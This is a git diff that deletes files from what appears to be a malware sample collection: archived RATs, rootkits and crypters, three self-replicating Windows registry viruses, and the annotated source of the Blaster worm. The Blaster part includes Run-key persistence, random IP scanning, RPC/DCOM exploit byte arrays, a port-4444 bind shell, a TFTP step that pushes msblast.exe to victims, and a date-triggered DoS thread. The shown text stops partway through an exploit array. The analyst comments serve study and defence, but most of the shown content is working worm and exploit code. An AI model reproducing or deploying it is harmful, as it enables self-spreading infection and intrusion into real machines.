diff --git a/Win32/Adrena.7z b/Win32/Adrena.7z
deleted file mode 100644
index a7fd6926..00000000
Binary files a/Win32/Adrena.7z and /dev/null differ
diff --git a/Win32/Backdoor.Win32.Aryan.7z b/Win32/Backdoor.Win32.Aryan.7z
deleted file mode 100644
index e54b3efe..00000000
Binary files a/Win32/Backdoor.Win32.Aryan.7z and /dev/null differ
diff --git a/Win32/NytrojanByNytro.7z b/Win32/NytrojanByNytro.7z
deleted file mode 100644
index a6def205..00000000
Binary files a/Win32/NytrojanByNytro.7z and /dev/null differ
diff --git a/Win32/OminousRAT.7z b/Win32/OminousRAT.7z
deleted file mode 100644
index 626e47a3..00000000
Binary files a/Win32/OminousRAT.7z and /dev/null differ
diff --git a/Win32/PlutoniumByMr3amo.7z b/Win32/PlutoniumByMr3amo.7z
deleted file mode 100644
index e6143d91..00000000
Binary files a/Win32/PlutoniumByMr3amo.7z and /dev/null differ
diff --git a/Win32/RST.Trojan.7z b/Win32/RST.Trojan.7z
deleted file mode 100644
index 473f3f56..00000000
Binary files a/Win32/RST.Trojan.7z and /dev/null differ
diff --git a/Win32/UnnamedRootkit.7z b/Win32/UnnamedRootkit.7z
deleted file mode 100644
index fa0b1d3d..00000000
Binary files a/Win32/UnnamedRootkit.7z and /dev/null differ
diff --git a/Win32/VbsCrypterByTrojanHorce.7z b/Win32/VbsCrypterByTrojanHorce.7z
deleted file mode 100644
index 97cd2577..00000000
Binary files a/Win32/VbsCrypterByTrojanHorce.7z and /dev/null differ
diff --git a/Win32/Virus.WinREG.Antireg.b b/Win32/Virus.WinREG.Antireg.b
deleted file mode 100644
index 02fe7cfd..00000000
--- a/Win32/Virus.WinREG.Antireg.b
+++ /dev/null
@@ -1,13 +0,0 @@
-REGEDIT4
-
-;;-------------------------------;;
-;; ;;
-;; AntiREG (The First REG Virus) ;;
-;; Coded By Lys Kovick ;;
-;; Special Thanks To Phage ;;
-;; ;;
-;;-------------------------------;;
-
-[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\]
-@="command /c for %i in (%windir%\\system\\*.reg) do regedit /e %i HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
-
diff --git a/Win32/Virus.WinREG.Sptohell b/Win32/Virus.WinREG.Sptohell
deleted file mode 100644
index c7b96c44..00000000
--- a/Win32/Virus.WinREG.Sptohell
+++ /dev/null
@@ -1,24 +0,0 @@
-REGEDIT 4
-
-;; WinREG.Wow
-;; written by SeCoNd PaRt To HeLl
-;; for my Virus Database
-
-[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\]
-@="command /c for %q in (%windir%\*.reg %path%\*.reg C:\*.reg %windir%\system\*.reg) do regedit /e %q HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
-
-;; Wow
-;; WowWow
-;; WowWowWow
-;; WowWowWowWow
-;; WowWowWowWowWow
-;; WowWowWowWowWowWow
-;; WowWowWowWowWowWowWow
-;; WowWowWowWowWowWowWowWow
-;; WowWowWowWowWowWowWow
-;; WowWowWowWowWowWow
-;; WowWowWowWowWow
-;; WowWowWowWow
-;; WowWowWow
-;; WowWow
-;; Wow
\ No newline at end of file
diff --git a/Win32/Virus.WinREG.Sptohell.b b/Win32/Virus.WinREG.Sptohell.b
deleted file mode 100644
index c2fca8c0..00000000
--- a/Win32/Virus.WinREG.Sptohell.b
+++ /dev/null
@@ -1,14 +0,0 @@
-REGEDIT 4
-
-;; *************** --> WinREG.Sptohell <-- + + + --> by Second Part To Hell [rRlf] <-- ***************
-;;
-;; You may ask: "Why do I write such an nonsence virus?"! +fg+ The reason is, that I have nerver seen such an virus
-;; in any ezine before. And I think, much ppl don't know, that such viruses exist.
-;;
-;; The virus itself is fuckin easy. First it copies itself to the Registry, so the code will started by every
-;; start of the computer. The code searchs for every *.reg file in 4 directories. If it finds some, it copies
-;; itself (the code in the registry) to these .REG-files.
-
-
-[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\]
-@="command /c for %q in (%windir%\*.reg %path%\*.reg C:\*.reg %windir%\system\*.reg) do regedit /e %q HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
\ No newline at end of file
diff --git a/Win32/Win32.4HorseMan.a.7z b/Win32/Win32.4HorseMan.a.7z
deleted file mode 100644
index f2f6e4a7..00000000
Binary files a/Win32/Win32.4HorseMan.a.7z and /dev/null differ
diff --git a/Win32/Win32.4HorseMan.b.7z b/Win32/Win32.4HorseMan.b.7z
deleted file mode 100644
index 19706f0e..00000000
Binary files a/Win32/Win32.4HorseMan.b.7z and /dev/null differ
diff --git a/Win32/Win32.A59.7z b/Win32/Win32.A59.7z
deleted file mode 100644
index b768d28c..00000000
Binary files a/Win32/Win32.A59.7z and /dev/null differ
diff --git a/Win32/Win32.Acid.b.7z b/Win32/Win32.Acid.b.7z
deleted file mode 100644
index e21c03ba..00000000
Binary files a/Win32/Win32.Acid.b.7z and /dev/null differ
diff --git a/Win32/Win32.Ago.c.7z b/Win32/Win32.Ago.c.7z
deleted file mode 100644
index f4eace90..00000000
Binary files a/Win32/Win32.Ago.c.7z and /dev/null differ
diff --git a/Win32/Win32.Ak.7z b/Win32/Win32.Ak.7z
deleted file mode 100644
index 4e780d61..00000000
Binary files a/Win32/Win32.Ak.7z and /dev/null differ
diff --git a/Win32/Win32.Algus.f.7z b/Win32/Win32.Algus.f.7z
deleted file mode 100644
index c10d0113..00000000
Binary files a/Win32/Win32.Algus.f.7z and /dev/null differ
diff --git a/Win32/Win32.Beta.7z b/Win32/Win32.Beta.7z
deleted file mode 100644
index 01aed72b..00000000
Binary files a/Win32/Win32.Beta.7z and /dev/null differ
diff --git a/Win32/Win32.BlackDream.7z b/Win32/Win32.BlackDream.7z
deleted file mode 100644
index 3387fe32..00000000
Binary files a/Win32/Win32.BlackDream.7z and /dev/null differ
diff --git a/Win32/Win32.Blaster.cpp b/Win32/Win32.Blaster.cpp
deleted file mode 100644
index a906d19c..00000000
--- a/Win32/Win32.Blaster.cpp
+++ /dev/null
@@ -1,1351 +0,0 @@ -#include -#include /*IP_HDRINCL*/ -#include /*InternetGetConnectedState*/ -#include - -#pragma comment (lib, "ws2_32.lib") -#pragma comment (lib, "wininet.lib") -#pragma comment (lib, "advapi32.lib") - - -/* -* These strings aren't used in the worm, Buford put them here -* so that whitehat researchers would discover them. -* BUFORD: Note that both of these messages are the typical -* behavior of a teenager who recently discovered love, and -* is in the normal teenage mode of challenging authority. -*/ -const char msg1[]="I just want to say LOVE YOU SAN!!"; -const char msg2[]="billy gates why do you make this possible ?" -" Stop making money and fix your software!!"; - - -/* -* Buford probably put the worm name as a "define" at the top -* of his program so that he could change the name at any time. -* 2003-09-29: This is the string that Parson changed. -*/ -#define MSBLAST_EXE "msblast.exe" - -/* -* MS-RPC/DCOM runs over port 135. -* DEFENSE: firewalling port 135 will prevent systems from -* being exploited and will hinder the spread of this worm. -*/ -#define MSRCP_PORT_135 135 - -/* -* The TFTP protocol is defined to run on port 69. Once this -* worm breaks into a victim, it will command it to download -* the worm via TFTP. Therefore, the worms briefly runs a -* TFTP service to deliver that file. -* DEFENSE: firewalling 69/udp will prevent the worm from -* fully infected a host. -*/ -#define TFTP_PORT_69 69 - -/* -* The shell-prompt is established over port 4444. The -* exploit code (in the variable 'sc') commands the victim -* to "bind a shell" on this port. The exploit then connects -* to that port to send commands, such as TFTPing the -* msblast.exe file down and launching it. -* DEFENSE: firewalling 4444/tcp will prevent the worm from -* spreading. -*/ -#define SHELL_PORT_4444 4444 - - -/* -* A simple string to hold the current IP address -*/ -char target_ip_string[16]; - -/* -* A global variable to hold the socket for the TFTP service. 
-*/ -int fd_tftp_service; - -/* -* Global flag to indicate this thread is running. This -* is set when the thread starts, then is cleared when -* the thread is about to end. -* This demonstrates that Buford isn't confident with -* multi-threaded programming -- he should just check -* the thread handle. -*/ -int is_tftp_running; - -/* -* When delivering the worm file to the victim, it gets the -* name by querying itself using GetModuleFilename(). This -* makes it easier to change the filename or to launch the -* worm. */ -char msblast_filename[256+4]; - -int ClassD, ClassC, ClassB, ClassA; - -int local_class_a, local_class_b; - -int winxp1_or_win2k2; - - -ULONG WINAPI blaster_DoS_thread(LPVOID); -void blaster_spreader(); -void blaster_exploit_target(int fd, const char *victim_ip); -void blaster_send_syn_packet(int target_ip, int fd); - - -/*************************************************************** -* This is where the 'msblast.exe' program starts running -***************************************************************/ -void main(int argc, char *argv[]) -{ -WSADATA WSAData; -char myhostname[512]; -char daystring[3]; -char monthstring[3]; -HKEY hKey; -int ThreadId; -register unsigned long scan_local=0; - -/* -* Create a registry key that will cause this worm -* to run every time the system restarts. -* DEFENSE: Slammer was "memory-resident" and could -* be cleaned by simply rebooting the machine. -* Cleaning this worm requires this registry entry -* to be deleted. -*/ -RegCreateKeyEx( -/*hKey*/ HKEY_LOCAL_MACHINE, -/*lpSubKey*/ "SOFTWARE\\Microsoft\\Windows\\" -"CurrentVersion\\Run", -/*Reserved*/ 0, -/*lpClass*/ NULL, -/*dwOptions*/ REG_OPTION_NON_VOLATILE, -/*samDesired */ KEY_ALL_ACCESS, -/*lpSecurityAttributes*/ NULL, -/*phkResult */ &hKey, -/*lpdwDisposition */ 0); -RegSetValueExA( -hKey, -"windows auto update", -0, -REG_SZ, -MSBLAST_EXE, -50); -RegCloseKey(hKey); - - -/* -* Make sure this isn't a second infection. 
A common problem -* with worms is that they sometimes re-infect the same -* victim repeatedly, eventually crashing it. A crashed -* system cannot spread the worm. Therefore, worm writers -* now make sure to prevent reinfections. The way Blaster -* does this is by creating a system "global" object called -* "BILLY". If another program in the computer has already -* created "BILLY", then this instance won't run. -* DEFENSE: this implies that you can remove Blaster by -* creating a mutex named "BILLY". When the computer -* restarts, Blaster will falsely believe that it has -* already infected the system and will quit. -*/ -CreateMutexA(NULL, TRUE, "BILLY"); -if (GetLastError() == ERROR_ALREADY_EXISTS) -ExitProcess(0); - -/* -* Windows systems requires "WinSock" (the network API layer) -* to be initialized. Note that the SYNflood attack requires -* raw sockets to be initialized, which only works in -* version 2.2 of WinSock. -* BUFORD: The following initialization is needlessly -* complicated, and is typical of programmers who are unsure -* of their knowledge of sockets.. -*/ -if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0 -&& WSAStartup(MAKEWORD(1,1), &WSAData) != 0 -&& WSAStartup(1, &WSAData) != 0) -return; - -/* -* The worm needs to read itself from the disk when -* transferring to the victim. Rather than using a hard-coded -* location, it discovered the location of itself dynamically -* through this function call. This has the side effect of -* making it easier to change the name of the worm, as well -* as making it easier to launch it. -*/ -GetModuleFileNameA(NULL, msblast_filename, -sizeof(msblast_filename)); - -/* -* When the worm infects a dialup machine, every time the user -* restarts their machine, the worm's network communication -* will cause annoying 'dial' popups for the user. This will -* make them suspect their machine is infected. 
-* The function call below makes sure that the worm only -* starts running once the connection to the Internet -* has been established and not before. -* BUFORD: I think Buford tested out his code on a machine -* and discovered this problem. Even though much of the -* code indicates he didn't spend much time on -* testing his worm, this line indicates that he did -* at least a little bit of testing. -*/ -while (!InternetGetConnectedState(&ThreadId, 0)) -Sleep (20000); /*wait 20 seconds and try again */ - -/* -* Initialize the low-order byte of target IP address to 0. -*/ -ClassD = 0; - -/* -* The worm must make decisions "randomly": each worm must -* choose different systems to infect. In order to make -* random choices, the programmer must "seed" the random -* number generator. The typical way to do this is by -* seeding it with the current timestamp. -* BUFORD: Later in this code you'll find that Buford calls -* 'srand()' many times to reseed. This is largely -* unnecessary, and again indicates that Buford is not -* confident in his programming skills, so he constantly -* reseeds the generator in order to make extra sure he -* has gotten it right. -*/ -srand(GetTickCount()); - -/* -* This initializes the "local" network to some random -* value. The code below will attempt to figure out what -* the true local network is -- but just in case it fails, -* the initialization fails, using random values makes sure -* the worm won't do something stupid, such as scan the -* network around 0.0.0.0 -*/ -local_class_a = (rand() % 254)+1; -local_class_b = (rand() % 254)+1; - -/* -* This discovers the local IP address used currently by this -* victim machine. Blaster randomly chooses to either infect -* just the local ClassB network, or some other network, -* therefore it needs to know the local network. -* BUFORD: The worm writer uses a complex way to print out -* the IP address into a string, then parse it back again -* to a number. 
This demonstrates that Buford is fairly -* new to C programming: he thinks in terms of the printed -* representation of the IP address rather than in its -* binary form. -*/ -if (gethostname(myhostname, sizeof(myhostname)) != -1) { -HOSTENT *p_hostent = gethostbyname(myhostname); - -if (p_hostent != NULL && p_hostent->h_addr != NULL) { -struct in_addr in; -const char *p_addr_item; - -memcpy(&in, p_hostent->h_addr, sizeof(in)); -sprintf(myhostname, "%s", inet_ntoa(in)); - -p_addr_item = strtok(myhostname, "."); -ClassA = atoi(p_addr_item); - -p_addr_item = strtok(0, "."); -ClassB = atoi(p_addr_item); - -p_addr_item = strtok(0, "."); -ClassC = atoi(p_addr_item); - -if (ClassC > 20) { -/* When starting from victim's address range, -* try to start a little bit behind. This is -* important because the scanning logic only -* move forward. */ -srand(GetTickCount()); -ClassC -= (rand() % 20); -} -local_class_a = ClassA; -local_class_b = ClassB; -scan_local = TRUE; -} -} - - -/* -* This chooses whether Blaster will scan just the local -* network (40% chance) or a random network (60% chance) -*/ -srand(GetTickCount()); -if ((rand() % 20) < 12) -scan_local = FALSE; - -/* -* The known exploits require the hacker to indicate whether -* the victim is WinXP or Win2k. The worm has to guess. The -* way it guesses is that it chooses randomly. 80% of the time -* it will assume that all victims are WinXP, and 20% of the -* time it will assume all victims are Win2k. This means that -* propogation among Win2k machines will be slowed down by -* the fact Win2k machines are getting DoSed faster than they -* are getting exploited. -*/ -winxp1_or_win2k2 = 1; -if ((rand()%10) > 7) -winxp1_or_win2k2 = 2; - -/* -* If not scanning locally, then choose a random IP address -* to start with. -* BUG: this worm choose bad ranges above 224. This will -* cause a bunch of unnecessary multicast traffic. Weird -* multicast traffic has historically been an easy way of -* detecting worm activity. 
-*/ -if (!scan_local) { -ClassA = (rand() % 254)+1; -ClassB = (rand() % 254); -ClassC = (rand() % 254); -} - - -/* -* Check the date so that when in the certain range, it will -* trigger a DoS attack against Micosoft. The following -* times will trigger the DoS attack: -* Aug 16 through Aug 31 -* Spt 16 through Spt 30 -* Oct 16 through Oct 31 -* Nov 16 through Nov 30 -* Dec 16 through Dec 31 -* This applies to all years, and is based on local time. -* FAQ: The worm is based on "local", not "global" time. -* That means the DoS attack will start from Japan, -* then Asia, then Europe, then the United States as the -* time moves across the globe. -*/ -#define MYLANG MAKELANGID(LANG_ENGLISH, SUBLANG_DEFAULT) -#define LOCALE_409 MAKELCID(MYLANG, SORT_DEFAULT) -GetDateFormat( LOCALE_409, -0, -NULL, /*localtime, not GMT*/ -"d", -daystring, -sizeof(daystring)); -GetDateFormat( LOCALE_409, -0, -NULL, /*localtime, not GMT*/ -"M", -monthstring, -sizeof(monthstring)); -if (atoi(daystring) > 15 && atoi(monthstring) > 8) -CreateThread(NULL, 0, -blaster_DoS_thread, -0, 0, &ThreadId); - -/* -* As the final task of the program, go into worm mode -* trying to infect systems. -*/ -for (;;) -blaster_spreader(); - -/* -* It'll never reach this point, but in theory, you need a -* WSACleanup() after a WSAStartup(). -*/ -WSACleanup(); -} - - - -/* -* This will be called from CreateThread in the main worm body -* right after it connects to port 4444. After the thread is -* started, it then sends the string " -* tftp -i %d.%d.%d.%d GET msblast.exe" (where the %ds represents -* the IP address of the attacker). -* Once it sends the string, it then waits for 20 seconds for the -* TFTP server to end. If the TFTP server doesn't end, it calls -* TerminateThread. -*/ -DWORD WINAPI blaster_tftp_thread(LPVOID p) -{ -/* -* This is the protocol format of a TFTP packet. 
This isn't -* used in the code -- I just provide it here for reference -*/ -struct TFTP_Packet -{ -short opcode; -short block_id; -char data[512]; -}; - -char reqbuf[512]; /* request packet buffer */ -struct sockaddr_in server; /* server-side port number */ -struct sockaddr_in client; /* client IP address and port */ -int sizeof_client; /* size of the client structure*/ -char rspbuf[512]; /* response packet */ - -static int fd; /* the socket for the server*/ -register FILE *fp; -register block_id; -register int block_size; - -/* Set a flag indicating this thread is running. The other -* thread will check this for 20 seconds to see if the TFTP -* service is still alive. If this thread is still alive in -* 20 seconds, it will be killed. -*/ -is_tftp_running = TRUE; /*1 == TRUE*/ - -/* Create a server-socket to listen for UDP requests on */ -fd = socket(AF_INET, SOCK_DGRAM, 0); -if (fd == SOCKET_ERROR) -goto closesocket_and_exit; - -/* Bind the socket to 69/udp */ -memset(&server, 0, sizeof(server)); -server.sin_family = AF_INET; -server.sin_port = htons(TFTP_PORT_69); -server.sin_addr.s_addr = 0; /*TFTP server addr = */ -if (bind(fd, (struct sockaddr*)&server, sizeof(server)) != 0) -goto closesocket_and_exit; - -/* Receive a packet, any packet. The contents of the received -* packet are ignored. This means, BTW, that a defensive -* "worm-kill" could send a packet from somewhere else. This -* will cause the TFTP server to download the msblast.exe -* file to the wrong location, preventing the victim from -* doing the download. */ -sizeof_client = sizeof(client); -if (recvfrom(fd, reqbuf, sizeof(reqbuf), 0, -(struct sockaddr*)&client, &sizeof_client) <= 0) -goto closesocket_and_exit; - -/* The TFTP server will respond with many 512 byte blocks -* until it has completely sent the file; each block must -* have a unique ID, and each block must be acknowledged. -* BUFORD: The worm ignores TFTP ACKs. 
This is probably why -* the worm restarts the TFTP service rather than leaving it -* enabled: it essentially flushes all the ACKs from the -* the incoming packet queue. If the ACKs aren't flushed, -* the worm will incorrectly treat them as TFTP requests. -*/ -block_id = 0; - -/* Open this file. GetModuleFilename was used to figure out -* this filename. */ -fp = fopen(msblast_filename, "rb"); -if (fp == NULL) -goto closesocket_and_exit; - -/* Continue sending file fragments until none are left */ -for (;;) { -block_id++; - -/* Build TFTP header */ -#define TFTP_OPCODE_DATA 3 -*(short*)(rspbuf+0) = htons(TFTP_OPCODE_DATA); -*(short*)(rspbuf+2)= htons((short)block_id); - -/* Read next block of data (about 12 blocks total need -* to be read) */ -block_size = fread(rspbuf+4, 1, 512, fp); - -/* Increase the effective length to include the TFTP -* head built above */ -block_size += 4; - -/* Send this block */ -if (sendto(fd, (char*)&rspbuf, block_size, -0, (struct sockaddr*)&client, sizeof_client) <= 0) -break; - -/* Sleep for a bit. -* The reason for this is because the worm doesn't care -* about retransmits -- it therefore must send these -* packets slow enough so congestion doesn't drop them. -* If it misses a packet, then it will DoS the victim -* without actually infecting it. Worse: the intended -* victim will continue to send packets, preventing the -* worm from infecting new systems because the -* requests will misdirect TFTP. This design is very -* bad, and is my bet as the biggest single factor -* that slows down the worm. 
*/ -Sleep(900); - -/* File transfer ends when the last block is read, which -* will likely be smaller than a full-sized block*/ -if (block_size != sizeof(rspbuf)) { -fclose(fp); -fp = NULL; -break; -} -} - -if (fp != NULL) -fclose(fp); - -closesocket_and_exit: - -/* Notify that the thread has stopped, so that the waiting -* thread can continue on */ -is_tftp_running = FALSE; -closesocket(fd); -ExitThread(0); - -return 0; -} - - - - -/* -* This function increments the IP address. -* BUFORD: This conversion from numbers, to strings, then back -* to number is overly complicated. Experienced programmers -* would simply store the number and increment it. This shows -* that Buford does not have much experience work with -* IP addresses. -*/ -void blaster_increment_ip_address() -{ -for (;;) { -if (ClassD <= 254) { -ClassD++; -return; -} - -ClassD = 0; -ClassC++; -if (ClassC <= 254) -return; -ClassC = 0; -ClassB++; -if (ClassB <= 254) -return; -ClassB = 0; -ClassA++; -if (ClassA <= 254) -continue; -ClassA = 0; -return; -} -} - - -/* -* This is called from the main() function in an -* infinite loop. It scans the next 20 addresses, -* then exits. -*/ -void blaster_spreader() -{ -fd_set writefds; - -register int i; -struct sockaddr_in sin; -struct sockaddr_in peer; -int sizeof_peer; -int sockarray[20]; -int opt = 1; -const char *victim_ip; - -/* Create the beginnings of a "socket-address" structure that -* will be used repeatedly below on the 'connect()' call for -* each socket. This structure specified port 135, which is -* the port used for RPC/DCOM. */ -memset(&sin, 0, sizeof(sin)); -sin.sin_family = AF_INET; -sin.sin_port = htons(MSRCP_PORT_135); - -/* Create an array of 20 socket descriptors */ -for (i=0; i<20; i++) { -sockarray[i] = socket(AF_INET, SOCK_STREAM, 0); -if (sockarray[i] == -1) -return; -ioctlsocket(sockarray[i], FIONBIO , &opt); -} - -/* Initiate a "non-blocking" connection on all 20 sockets -* that were created above. 
-* FAQ: Essentially, this means that the worm has 20 -* "threads" -- even though they aren't true threads. -*/ -for (i=0; i<20; i++) { -int ip; - -blaster_increment_ip_address(); -sprintf(target_ip_string, "%i.%i.%i.%i", -ClassA, ClassB, ClassC, ClassD); - -ip = inet_addr(target_ip_string); -if (ip == -1) -return; -sin.sin_addr.s_addr = ip; -connect(sockarray[i],(struct sockaddr*)&sin,sizeof(sin)); -} - -/* Wait 1.8-seconds for a connection. -* BUG: this is often not enough, especially when a packet -* is lost due to congestion. A small timeout actually makes -* the worm slower than faster */ -Sleep(1800); - -/* Now test to see which of those 20 connections succeeded. -* BUFORD: a more experienced programmer would have done -* a single 'select()' across all sockets rather than -* repeated calls for each socket. */ -for (i=0; i<20; i++) { -struct timeval timeout; -int nfds; - -timeout.tv_sec = 0; -timeout.tv_usec = 0; -nfds = 0; - -FD_ZERO(&writefds); -FD_SET((unsigned)sockarray[i], &writefds); - -if (select(0, NULL, &writefds, NULL, &timeout) != 1) { -closesocket(sockarray[i]); -} else { -sizeof_peer = sizeof(peer); -getpeername(sockarray[i], -(struct sockaddr*)&peer, &sizeof_peer); -victim_ip = inet_ntoa(peer.sin_addr); - -/* If connection succeeds, exploit the victim */ -blaster_exploit_target(sockarray[i], victim_ip); -closesocket(sockarray[i]); -} -} - -} - -/* -* This is where the victim is actually exploited. It is the same -* exploit as created by xfocus and altered by HDMoore. -* There are a couple of differences. The first is that the in -* those older exploits, this function itself would create the -* socket and connect, whereas in Blaster, the socket is already -* connected to the victim via the scanning function above. The -* second difference is that the packets/shellcode blocks are -* declared as stack variables rather than as static globals. 
-* Finally, whereas the older exploits give the hacker a -* "shell prompt", this one automates usage of the shell-prompt -* to tell the victim to TFTP the worm down and run it. -*/ -void blaster_exploit_target(int sock, const char *victim_ip) -{ - -/* These blocks of data are just the same ones copied from the -* xfocus exploit prototype. Whereas the original exploit -* declared these as "static" variables, Blaster declares -* these as "stack" variables. This is because the xfocus -* exploit altered them -- they must be reset back to their -* original values every time. */ -unsigned char bindstr[]={ -0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, - -0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, - -0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46, -0x00,0x00,0x00,0x00, -0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, -0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; - - - -unsigned char request1[]={ -0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03 -,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00 - -,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45 - -,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E - -,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D - -,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41 - -,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00 - -,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45 - -,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03 - 
-,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00 - -,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00 - -,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29 - -,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00 - -,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00 - -,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00 - -,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00 - -,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00 - -,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00 - -,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00 - -,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00 - -,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00 - -,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10 - -,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF - -,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10 - -,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09 - -,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00 - 
-,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00 - -,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00 - -,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00 - -,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00 - -,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01 - -,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03 - -,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00 - -,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E - -,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 - -,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00 - -,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00 - 